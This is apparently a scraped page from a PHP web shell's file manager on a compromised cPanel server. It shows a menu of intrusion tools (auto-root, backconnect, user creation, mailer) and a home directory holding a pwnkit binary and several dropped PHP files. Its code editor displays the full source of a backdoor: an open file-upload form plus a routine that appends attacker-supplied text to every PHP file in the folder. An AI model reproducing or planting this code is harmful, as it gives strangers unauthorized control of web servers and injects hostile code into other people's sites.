Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.70.126.83
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
aev999 /
[ HOME SHELL ]
Name
Size
Permission
Action
.caldav
[ DIR ]
drwxr-xr-x
.cpanel
[ DIR ]
drwx------
.htpasswds
[ DIR ]
drwxr-x---
.koality
[ DIR ]
drwxr-xr-x
.pkexec
[ DIR ]
drwxr-xr-x
.spamassassin
[ DIR ]
drwx------
.trash
[ DIR ]
drwx------
.wp-cli
[ DIR ]
drwxr-xr-x
.wp-toolkit
[ DIR ]
drwx------
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
access-logs
[ DIR ]
drwxr-x---
etc
[ DIR ]
drwxr-x---
logs
[ DIR ]
drwx------
mail
[ DIR ]
drwxr-x--x
public_ftp
[ DIR ]
drwxr-x---
public_html
[ DIR ]
drwxr-x---
ssl
[ DIR ]
drwxr-xr-x
tmp
[ DIR ]
drwxr-xr-x
wordpress-backups
[ DIR ]
drwx------
www
[ DIR ]
drwxr-x---
.bash_logout
220
B
-rw-r--r--
.bashrc
3.68
KB
-rw-r--r--
.imunify_patch_id
106
B
-rw-rw----
.lastlogin
603
B
-rw-------
.mad-root
0
B
-rw-r--r--
.myimunify_id
102
B
-rw-rw----
.profile
807
B
-rw-r--r--
.spamassassinboxenable
0
B
-rw-r--r--
.spamassassinenable
0
B
-rw-r--r--
.wget-hsts
215
B
-rw-r--r--
.wp-toolkit-identifier
684
B
-rw-------
adminer.php
465.43
KB
-rw-r--r--
error_log
225
B
-rw-r--r--
ftzthukh.php
760
B
-rw-r--r--
ovumnnzv.php
760
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
shoyo.php
0
B
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ovumnnzv.php
<?php echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>";?> <?php if (isset($_GET['bak'])) { $directory = __DIR__; $mama = $_POST['file']; $textToAppend = ' ' . $mama . ' '; if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if (pathinfo($file, PATHINFO_EXTENSION) === 'php') { $fileHandle = fopen($directory . '/' . $file, 'a'); fwrite($fileHandle, $textToAppend); fclose($fileHandle); echo "OK >> $file "; } } closedir($handle); } } ?>
Close